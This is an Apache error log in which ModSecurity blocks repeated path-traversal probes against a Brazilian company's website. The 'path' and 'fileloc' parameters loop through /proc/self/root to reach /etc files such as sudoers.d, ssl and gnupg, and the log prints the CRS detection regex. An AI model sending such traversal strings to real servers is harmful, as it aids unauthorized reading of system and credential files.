[Fri Mar 20 03:09:04.282561 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:54428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkgPu8EFLIOrSqIpvo7QAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:06.133497 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:54444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkgta6ubjKNq_cu4aY0gAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:09.161350 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:54454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkhfXLqtnMIWvjpaJjCgAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:09.501118 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:51184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkhda6ubjKNq_cu4aY1QAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:10.137776 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46552] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:09:11.155109 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.241.31:51528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkh_qxLDW4GITHUkSswwAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:12.454995 2026] [:error] [pid 30424:tid 140411548894976] [client 74.7.241.31:51534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkiMt36Dv4L1GW-s-iBwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:12.951299 2026] [:error] [pid 8307:tid 140411557287680] [client 74.7.243.128:36734] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkiL-FhjpZGs9ba8qu_QAAAxY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:13.815179 2026] [:error] [pid 30424:tid 140411607643904] [client 74.7.241.31:51534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkict36Dv4L1GW-s-iCQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:14.967519 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.243.128:36742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkihCii7xarUs8iHYuUAAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:15.445474 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:36742] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkixCii7xarUs8iHYuUQAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:17.280267 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.241.31:51544] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkjfXLqtnMIWvjpaJjLwAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:18.801027 2026] [:error] [pid 8307:tid 140411590858496] [client 74.7.243.128:36750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkjr-FhjpZGs9ba8qvAgAAAxI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:19.839027 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:57574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkj_XLqtnMIWvjpaJjPAAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:20.118147 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:44334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkkBCii7xarUs8iHYuVQAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:21.899319 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:44338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkkfqxLDW4GITHUkSszwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:24.218546 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:44346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzklBCii7xarUs8iHYuWwAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:26.042077 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.241.31:57576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzklRCii7xarUs8iHYuXQAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:31.680057 2026] [mime_magic:error] [pid 15826:tid 140411565680384] (70014)End of file found: [client 57.141.18.6:53772] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:09:32.133787 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47460] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:09:32.439923 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.241.31:60588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzknBCii7xarUs8iHYuZwAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:33.671212 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:44348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzknfXLqtnMIWvjpaJjSwAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:36.688523 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:44496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkoNa6ubjKNq_cu4aY6gAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:36.831289 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:60604] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkoAF0L0L-SsrnPo4yXQAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
